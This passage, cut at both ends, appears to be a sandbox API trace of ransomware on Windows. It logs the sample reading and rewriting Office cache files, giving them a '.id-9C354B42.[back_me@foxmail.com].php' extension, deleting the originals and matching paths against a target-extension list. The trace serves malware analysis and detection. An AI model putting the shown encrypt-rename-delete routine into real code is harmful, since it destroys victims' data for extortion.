users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 0x2020 [0045.990] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.990] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0045.990] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.991] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.991] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.991] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.996] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.996] ReadFile (in: hFile=0x1e8, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.006] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.006] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.006] ReadFile (in: hFile=0x1e8, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.021] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.021] WriteFile (in: hFile=0x1e8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0046.261] SetEndOfFile (hFile=0x1e8) returned 1 [0046.261] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0046.261] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.261] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.262] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.263] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.268] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.268] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.271] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0046.271] CloseHandle (hObject=0x1e8) returned 1 [0046.271] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0046.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.272] lstrlenW (lpString=".doc") returned 4 [0046.272] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.272] lstrlenW (lpString=".docx") returned 5 [0046.272] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.272] lstrlenW (lpString=".pdf") returned 4 [0046.272] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.272] lstrlenW (lpString=".xls") returned 4 [0046.272] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.272] lstrlenW (lpString=".xlsx") returned 5 [0046.272] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.272] lstrlenW (lpString=".ppt") returned 4 [0046.272] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.272] lstrlenW (lpString=".zip") returned 4 [0046.272] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.272] lstrlenW (lpString=".rar") returned 4 [0046.272] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.272] lstrlenW (lpString=".bz2") returned 4 [0046.272] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.272] lstrlenW (lpString=".7z") returned 3 [0046.272] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.272] lstrlenW (lpString=".dbf") returned 4 [0046.272] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.272] lstrlenW (lpString=".1cd") returned 4 [0046.272] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.272] lstrlenW (lpString=".jpg") returned 4 [0046.272] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.273] lstrlenW (lpString=".doc") returned 4 [0046.273] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.273] lstrlenW (lpString=".docx") returned 5 [0046.273] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.273] lstrlenW (lpString=".pdf") returned 4 [0046.273] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.273] lstrlenW (lpString=".xls") returned 4 [0046.273] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.273] lstrlenW (lpString=".xlsx") returned 5 [0046.273] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.273] lstrlenW (lpString=".ppt") returned 4 [0046.273] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.273] lstrlenW (lpString=".zip") returned 4 [0046.273] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.273] lstrlenW (lpString=".rar") returned 4 [0046.273] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.273] lstrlenW (lpString=".bz2") returned 4 [0046.273] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.273] lstrlenW (lpString=".7z") returned 3 [0046.273] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.273] lstrlenW (lpString=".dbf") returned 4 [0046.273] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.273] lstrlenW (lpString=".1cd") returned 4 [0046.273] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.273] lstrlenW (lpString=".jpg") returned 4 [0046.273] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.274] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0046.274] lstrlenW (lpString="dwintl20.dll") returned 12 [0046.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0046.274] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=107912) returned 1 [0046.274] CloseHandle (hObject=0x1e8) returned 1 [0046.274] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 0x2020 [0046.274] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0046.274] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.275] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.275] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.489] GetLastError () returned 0x0 [0046.489] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x1a588, lpOverlapped=0x0) returned 1 [0046.493] WriteFile (in: hFile=0x210, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x1a590, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x1a590, lpOverlapped=0x0) returned 1 [0046.496] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.496] WriteFile (in: hFile=0x210, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.496] SetEndOfFile (hFile=0x210) returned 1 [0046.496] CloseHandle (hObject=0x210) returned 1 [0046.496] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.496] SetEndOfFile (hFile=0x1e8) returned 1 [0046.497] CloseHandle (hObject=0x1e8) returned 1 [0046.498] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0046.498] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 1 [0046.498] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.498] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.498] lstrlenW (lpString=".doc") returned 4 [0046.498] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.498] lstrlenW (lpString=".docx") returned 5 [0046.498] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.498] lstrlenW (lpString=".pdf") returned 4 [0046.498] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.498] lstrlenW (lpString=".xls") returned 4 [0046.498] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.498] lstrlenW (lpString=".xlsx") returned 5 [0046.498] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.498] lstrlenW (lpString=".ppt") returned 4 [0046.498] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.498] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.498] lstrlenW (lpString=".zip") returned 4 [0046.498] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString=".rar") returned 4 [0046.499] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString=".bz2") returned 4 [0046.499] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.499] lstrlenW (lpString=".7z") returned 3 [0046.499] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.499] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.499] lstrlenW (lpString=".dbf") returned 4 [0046.499] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.499] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.499] lstrlenW (lpString=".1cd") returned 4 [0046.499] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.499] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.499] lstrlenW (lpString=".jpg") returned 4 [0046.499] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.499] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.499] lstrlenW (lpString=".doc") returned 4 [0046.499] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString=".docx") returned 5 [0046.499] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.499] lstrlenW (lpString=".pdf") returned 4 [0046.499] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString=".xls") returned 4 [0046.499] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString=".xlsx") returned 5 [0046.499] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.499] lstrlenW (lpString=".ppt") returned 4 [0046.499] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.499] lstrlenW (lpString=".zip") returned 4 [0046.499] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.499] lstrlenW (lpString=".rar") returned 4 [0046.499] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.500] lstrlenW (lpString=".bz2") returned 4 [0046.500] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.500] lstrlenW (lpString=".7z") returned 3 [0046.500] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.500] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.500] lstrlenW (lpString=".dbf") returned 4 [0046.500] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.500] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.500] lstrlenW (lpString=".1cd") returned 4 [0046.500] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.500] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.500] lstrlenW (lpString=".jpg") returned 4 [0046.500] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.500] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0046.500] lstrlenW (lpString="dwdcw20.dll") returned 11 [0046.500] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0046.500] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=526176) returned 1 [0046.500] CloseHandle (hObject=0x1e8) returned 1 [0046.500] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 0x2020 [0046.501] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.501] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0046.501] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.501] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.501] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.501] GetLastError () returned 0x0 [0046.501] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x80760, lpOverlapped=0x0) returned 1 [0046.513] WriteFile (in: hFile=0x210, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x80770, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x80770, lpOverlapped=0x0) returned 1 [0046.524] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.524] WriteFile (in: hFile=0x210, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.524] SetEndOfFile (hFile=0x210) returned 1 [0046.524] CloseHandle (hObject=0x210) returned 1 [0046.524] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.524] SetEndOfFile (hFile=0x1e8) returned 1 [0046.529] CloseHandle (hObject=0x1e8) returned 1 [0046.529] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0046.529] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 1 [0046.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.529] lstrlenW (lpString=".doc") returned 4 [0046.530] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString=".docx") returned 5 [0046.530] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.530] lstrlenW (lpString=".pdf") returned 4 [0046.530] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString=".xls") returned 4 [0046.530] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString=".xlsx") returned 5 [0046.530] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.530] lstrlenW (lpString=".ppt") returned 4 [0046.530] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.530] lstrlenW (lpString=".zip") returned 4 [0046.530] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString=".rar") returned 4 [0046.530] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString=".bz2") returned 4 [0046.530] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.530] lstrlenW (lpString=".7z") returned 3 [0046.530] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.530] lstrlenW (lpString=".dbf") returned 4 [0046.530] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.530] lstrlenW (lpString=".1cd") returned 4 [0046.530] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.530] lstrlenW (lpString=".jpg") returned 4 [0046.530] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.530] lstrlenW (lpString=".doc") returned 4 [0046.530] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.530] lstrlenW (lpString=".docx") returned 5 [0046.531] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.531] lstrlenW (lpString=".pdf") returned 4 [0046.531] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.531] lstrlenW 